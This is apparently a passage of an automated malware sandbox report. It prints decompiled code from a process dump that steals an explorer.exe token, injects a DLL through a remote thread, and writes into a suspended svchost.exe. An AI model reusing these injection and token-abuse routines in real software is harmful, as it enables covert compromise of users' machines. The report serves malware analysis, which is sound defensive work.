					 *(_t86 - 0x20) =  *(_t86 - 0x20) + 1;
					_t52 =  *(_t86 - 0x20);
					if(_t52 == 0) {
						 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						continue;
					}
					_t53 = _t52 - 1;
					if(_t53 == 0) {
						__eflags =  *((intOrPtr*)(_t86 - 0x2c)) - 0xd80;
						if(__eflags > 0) {
							 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						}
						E72B229E4(0xd80, _t80, _t82, _t85, __eflags,  *((intOrPtr*)(_t82 + 0x1b48)), _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x2c)), _t86 - 0x1c);
						__eflags =  *((intOrPtr*)(_t86 - 0x1c));
						L23:
						if(__eflags == 0) {
							E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
						}
						continue;
					}
					_t58 = _t53 - 1;
					if(_t58 == 0) {
						_t60 = 0xd80 -  *((intOrPtr*)(_t82 + 8));
						__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
						if( *((intOrPtr*)(_t86 - 0x1c)) > _t60) {
							_t78 =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							E72B215CC(_t82,  *((intOrPtr*)(_t86 - 0x1c)) - _t60, _t82, 0,  *((intOrPtr*)(_t86 - 0x1c)) - _t60);
						}
						_t62 = E72B2162F(0xd80, _t78, _t82, _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
						__eflags = _t62;
						goto L23;
					}
					_t64 = _t58 - 1;
					if(_t64 == 0) {
						WaitForSingleObject( *(_t85 + 0x1b10), 0xffffffff);
						continue;
					}
					_t66 = _t64 - 1;
					if(_t66 == 0) {
						_t68 = E72B215CC(_t82, __eflags, _t85, _t85 + 0xd8c, 0xd80);
						 *((intOrPtr*)(_t86 - 0x1c)) = _t68;
						__eflags = _t68;
						if(__eflags != 0) {
							continue;
						}
						L15:
						 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
						continue;
					}
					_t97 = _t66 != 1;
					if(_t66 != 1) {
						continue;
					}
					E72B22429(_t85, 2); // executed
					_t72 = E72B2294C(0xd80, _t80, _t85, _t97,  *((intOrPtr*)(_t85 + 0x1b48)), _t85 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
					if(_t72 == 0) {
						E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
					}
					E72B22429(_t85, 1); // executed
					goto L15;
				}
				 *(_t86 - 4) =  *(_t86 - 4) | 0xffffffff;
				__eflags = 0;
				return E72B2159C(0, _t80);
			}
















0x72b21829
0x72b21829
0x72b2182b
0x72b21830
0x72b21835
0x72b21839
0x72b21842
0x72b2184e
0x72b21858
0x72b21862
0x72b21862
0x72b21868
0x72b21871
0x72b2188e
0x72b21891
0x72b21894
0x72b21979
0x00000000
0x72b21979
0x72b2189a
0x72b2189b
0x72b21941
0x72b21944
0x72b21946
0x72b21946
0x72b2195d
0x72b21962
0x72b21966
0x72b21966
0x72b2196f
0x72b2196f
0x00000000
0x72b21966
0x72b218a1
0x72b218a2
0x72b21917
0x72b2191a
0x72b2191d
0x72b21922
0x72b21922
0x72b21928
0x72b21928
0x72b21938
0x72b2193d
0x00000000
0x72b2193d
0x72b218a4
0x72b218a5
0x72b2190a
0x00000000
0x72b2190a
0x72b218a7
0x72b218a8
0x72b218e9
0x72b218ee
0x72b218f1
0x72b218f3
0x00000000
0x00000000
0x72b218f9
0x72b218f9
0x00000000
0x72b218f9
0x72b218aa
0x72b218ab
0x00000000
0x00000000
0x72b218b0
0x72b218c5
0x72b218cc
0x72b218d1
0x72b218d1
0x72b218d9
0x00000000
0x72b218d9
0x72b219bc
0x72b219c0
0x72b219c7

APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B21862
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B2190A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: ObjectSingleWait
  • String ID:
  • API String ID: 24740636-0
  • Opcode ID: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
  • Instruction ID: 1cd3c94c938bd48e2da1cd979ccb837cf298ca92addc6a0b682ed9aa0d1bd90e
  • Opcode Fuzzy Hash: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
  • Instruction Fuzzy Hash: 6E41557492070AABDF168BBCCC40BEDBAF8FF44316F009125E92EB5196E7346552CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 281 72b2162f-72b2163d 282 72b21650-72b21663 call 72b21a7e 281->282 283 72b2163f-72b21646 call 72b2278e 281->283 289 72b21665-72b21666 282->289 290 72b216ab-72b216b1 call 72b215ad 282->290 286 72b2164b-72b2164e 283->286 288 72b216b2-72b216b7 286->288 292 72b21669-72b2166f 289->292 290->288 294 72b21671-72b21673 292->294 295 72b216aa 292->295 296 72b21675-72b2167d 294->296 297 72b2167e-72b21694 294->297 295->290 296->297 298 72b216a2-72b216a8 297->298 299 72b21696-72b2169c SetEvent 297->299 298->292 298->295 299->298
C-Code - Quality: 100%
			E72B2162F(void* __ebx, void* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _t38;
				signed int _t40;
				signed int* _t51;

				_t51 = _a4;
				_t52 = _t51[0x6d1] & 0x00000004;
				if((_t51[0x6d1] & 0x00000004) == 0) {
					E72B21A7E(_t51);
					_a4 = _a4 & 0x00000000;
					__eflags = _t51[2] - 0xd80;
					if(_t51[2] < 0xd80) {
						_t40 = _a8;
						while(1) {
							__eflags = _a4 - _a12;
							if(_a4 >= _a12) {
								break;
							}
							__eflags = _t40;
							if(_t40 != 0) {
								 *((char*)( &(_t51[3]) +  *_t51)) =  *_t40;
								_t40 = _t40 + 1;
								__eflags = _t40;
							}
							_t21 = _t51[2] + 1; // 0x1
							_t51[2] = _t21;
							 *_t51 = ( *_t51 + 1) % 0xd80;
							__eflags = _t51[2];
							if(_t51[2] == 0) {
								SetEvent(_t51[0x6c4]);
							}
							_a4 = _a4 + 1;
							__eflags = _t51[2] - 0xd80;
							if(_t51[2] < 0xd80) {
								continue;
							}
							break;
						}
					}
					E72B215AD(_t51);
				} else {
					_t38 = E72B2278E(__ecx, _t52, _t51, _a8, _a12); // executed
					_a4 = _t38;
				}
				return _a4;
			}






0x72b21633
0x72b21636
0x72b2163d
0x72b21652
0x72b21657
0x72b21660
0x72b21663
0x72b21666
0x72b21669
0x72b2166c
0x72b2166f
0x00000000
0x00000000
0x72b21671
0x72b21673
0x72b21679
0x72b2167d
0x72b2167d
0x72b2167d
0x72b2168a
0x72b2168d
0x72b21690
0x72b21692
0x72b21694
0x72b2169c
0x72b2169c
0x72b216a2
0x72b216a5
0x72b216a8
0x00000000
0x00000000
0x00000000
0x72b216a8
0x72b216aa
0x72b216ac
0x72b2163f
0x72b21646
0x72b2164b
0x72b2164b
0x72b216b7

APIs
  • SetEvent.KERNEL32(?,00000000,?,?), ref: 72B2169C
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Event
  • String ID:
  • API String ID: 4201588131-0
  • Opcode ID: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
  • Instruction ID: cac046f5e760f0a29d4f7e5bf99a1d4e3a1b154928ebae07cd67838b8cd1f331
  • Opcode Fuzzy Hash: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
  • Instruction Fuzzy Hash: C9114F31610745AFC722CF59C890A8ABBE5EF95351B14D81EE85E87212D731A981CB54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 300 72b21c2c-72b21c32 call 72b21f95 302 72b21c37-72b21c39 ExitThread 300->302
C-Code - Quality: 100%
			E72B21C2C(intOrPtr _a4) {
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				E72B21F95(_t3, _t4, _t5, _t6, _t7, _t8, _a4); // executed
				ExitThread(0);
			}









0x72b21c32
0x72b21c39

APIs
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9
  • ExitThread.KERNEL32 ref: 72B21C39
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HandleThread$CloseCreateExitMultipleObjectsRemoteResumeWait
  • String ID:
  • API String ID: 3079971139-0
  • Opcode ID: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
  • Instruction ID: 8207a6a918aad3a41bed777c7a348672e9e46877dcf1a2a6b4e42e1e27abc60a
  • Opcode Fuzzy Hash: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
  • Instruction Fuzzy Hash: 4AB0127005830CBBC6003F56CC09B093E9ADB40782F009014F50C190639B61550145A2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22414() {
				void* _t7;

				 *(_t7 - 0x1c) =  *(_t7 - 0x1c) & 0x00000000;
				 *(_t7 - 4) =  *(_t7 - 4) | 0xffffffff;
				ExitThread( *(_t7 - 0x1c));
			}




0x72b22417
0x72b2241b
0x72b22422

APIs
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: ExitThread
  • String ID:
  • API String ID: 2158977761-0
  • Opcode ID: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
  • Instruction ID: 483b617358438d905fdb998ea22e0a77d6154b95692ace215674c7f6aa0f4695
  • Opcode Fuzzy Hash: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
  • Instruction Fuzzy Hash: 5AC04C31C1030ADBCF118B91C90A3AEBB71EB00321F2083489431720E5C73406229F51
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 92%
			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}














0x72b22123
0x72b22123
0x72b22125
0x72b2212a
0x72b2212f
0x72b22133
0x72b22138
0x72b22147
0x72b22149
0x72b2214e
0x72b22223
0x72b22227
0x72b2222c
0x72b2222c
0x72b22236
0x72b2223b
0x72b2223b
0x72b22249
0x72b22249
0x72b22160
0x72b22162
0x72b22167
0x00000000
0x00000000
0x72b22173
0x72b22175
0x72b2217a
0x00000000
0x00000000
0x72b22185
0x72b22188
0x72b2218e
0x72b22193
0x00000000
0x00000000
0x72b221a2
0x72b221a6
0x72b221bb
0x00000000
0x00000000
0x72b221bd
0x72b221bf
0x00000000
0x00000000
0x72b221c1
0x72b221c6
0x72b221c9
0x72b221c9
0x72b221ce
0x00000000
0x00000000
0x72b221d0
0x72b221d5
0x72b221dd
0x00000000
0x00000000
0x72b221ee
0x72b221f2
0x72b221fe
0x72b22205
0x72b22205
0x72b2221f
0x72b2221f
0x00000000
0x72b2220d
0x72b2220f
0x00000000
0x00000000
0x72b22211
0x72b22213
0x72b22213
0x72b221c9
0x72b221ab
0x72b221b1
0x72b221b5
0x00000000
0x72b221b5
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
  • LocalFree.KERNEL32(00000000), ref: 72B221AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
  • CloseHandle.KERNEL32(00000000), ref: 72B22205
  • FreeLibrary.KERNEL32(00000000), ref: 72B2222C
  • LocalFree.KERNEL32(00000000), ref: 72B2223B
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
  • Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
  • Opcode Fuzzy Hash: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
  • Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x72b227d2
0x72b227d5
0x72b227d6
0x72b227db
0x72b227f2
0x72b227f6
0x72b22812
0x72b22825
0x72b22825
0x72b22832
0x72b22832
0x72b2283f

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004), ref: 72B227EC
  • lstrlenA.KERNEL32(?,00000000), ref: 72B227FD
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001), ref: 72B2280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 72B22832
    • Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
    • Part of subcall function 72B224BC: CloseHandle.KERNEL32(?), ref: 72B22523
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
  • Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
  • Opcode Fuzzy Hash: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
  • Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t84;
				intOrPtr _t93;
				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				_t67 =  *0x72b26008; // 0x72b27204
				_t3 = _t67 + 0x34; // 0x72b232de
				 *((intOrPtr*)(_t125 - 0x24)) =  *_t3;
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4; // 0x72b20000
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							_t93 =  *0x72b26008; // 0x72b27204
							_t49 = _t93 + 0x34; // 0x72b232de
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *_t49, 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								__eflags =  *0x72b26038; // 0x1
								if(__eflags != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}












0x72b22adb
0x72b22adb
0x72b22adb
0x72b22ae0
0x72b22ae5
0x72b22aec
0x72b22aef
0x72b22af2
0x72b22af7
0x72b22afa
0x72b22afd
0x72b22b00
0x72b22b13
0x72b22b19
0x72b22b1e
0x72b22cf5
0x72b22cf5
0x72b22cf9
0x72b22d06
0x72b22b24
0x72b22b26
0x72b22b30
0x72b22b35
0x72b22b3d
0x72b22b41
0x72b22b4b
0x72b22b51
0x72b22b70
0x72b22b70
0x72b22b78
0x72b22c16
0x72b22b7a
0x72b22b7a
0x72b22b7d
0x72b22b80
0x72b22b9a
0x72b22ba7
0x72b22bad
0x72b22bad
0x72b22bb0
0x72b22bb1
0x72b22bb6
0x72b22bb7
0x72b22be3
0x72b22be9
0x72b22bee
0x72b22bee
0x72b22be9
0x72b22c1c
0x72b22c43
0x72b22c43
0x72b22c48
0x00000000
0x00000000
0x72b22c51
0x72b22c53
0x72b22c53
0x72b22c70
0x72b22c79
0x72b22cc2
0x00000000
0x72b22c7b
0x72b22c82
0x72b22c87
0x72b22c8d
0x72b22c95
0x72b22cc8
0x72b22cc8
0x72b22cce
0x72b22ced
0x72b22cf2
0x72b22cd0
0x72b22ce5
0x72b22ce5
0x00000000
0x72b22cce
0x00000000
0x72b22c95
0x72b22c1e
0x72b22c21
0x72b22c97
0x72b22c9a
0x72b22ca0
0x72b22ca9
0x72b22ca9
0x72b22cb2
0x72b22cb7
0x72b22cb7
0x00000000
0x72b22cb2
0x72b22c2b
0x72b22c40
0x00000000
0x72b22c40
0x72b22c1c

APIs
  • GetCurrentProcessId.KERNEL32(72B25410,00000180,72B232A3,00000000,00000001), ref: 72B22B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 72B22B92
  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 72B22BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 72B22BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
  • CloseHandle.KERNEL32(?), ref: 72B22BEE
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 72B22C10
  • WriteProcessMemory.KERNEL32(?,?,72B260C8,00000080,00000000), ref: 72B22C70
  • TerminateProcess.KERNEL32(?,00000000), ref: 72B22CA0
    • Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32 ref: 72B225AF
    • Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • CloseHandle.KERNEL32(?), ref: 72B22CA9
  • CloseHandle.KERNEL32(?), ref: 72B22CB7
  • ResumeThread.KERNEL32(?), ref: 72B22CC2
  • CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
  • Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
  • Opcode Fuzzy Hash: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
  • Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
